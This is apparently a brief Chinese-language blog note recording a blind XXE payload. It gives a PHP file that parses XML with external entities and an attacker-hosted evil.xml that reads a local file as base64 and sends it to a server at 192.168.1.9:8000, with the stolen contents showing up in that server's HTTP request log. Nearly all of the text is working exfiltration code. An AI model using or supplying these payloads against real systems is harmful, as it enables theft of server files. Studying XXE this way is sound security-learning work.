XXE Payload

前言

      今天了解了一下XXE,记录一下盲注payload.

payload

0.被攻击方对在漏洞的xml文件,这里直接写在php文件里了
xml.php

<?php  
$xml=<<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
 <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/phpstudy/WWW/test.txt">
 <!ENTITY % xml SYSTEM "http://192.168.1.9:8000/evil.xml">
%xml;
%send;
]>
EOF;
$data = simplexml_load_string($xml);
print_r($data);
?>

1.攻击方服务器上的xml文件
evil.xml

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://192.168.1.9:8000/get.php?file=%file;'>"
>
%all;

2.要读取的文件
C:/phpstudy/WWW/test.txt
3.攻击方开启一个http服务器,在get请求中就能看到想要读取的文件内容了,这里进行了base64加密(防止url被截断).

念念不忘,必有回响。